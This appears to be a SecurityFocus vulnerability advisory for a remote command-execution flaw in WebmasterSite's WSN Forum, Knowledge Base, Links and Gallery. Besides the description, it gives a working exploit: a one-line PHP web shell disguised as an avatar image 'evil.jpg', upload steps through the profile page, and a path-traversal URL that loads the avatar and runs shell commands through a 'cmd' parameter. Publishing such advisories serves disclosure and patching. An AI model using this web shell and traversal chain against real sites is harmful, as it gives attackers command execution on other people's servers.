source: https://www.securityfocus.com/bid/30572/info

Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.

This issue affects the following products:

WSN Forum 4.1.43
WSN Knowledge Base 4.1.36
WSN Links 4.1.44
WSN Gallery 4.1.30

Note that previous versions may also be vulnerable. 

Avatar evil.jpg source:
<? system($_GET['cmd']); ?>

Enter to upload: 
http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]

See the avatar name at your profile.

Upload evil avatar and go to: 
http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al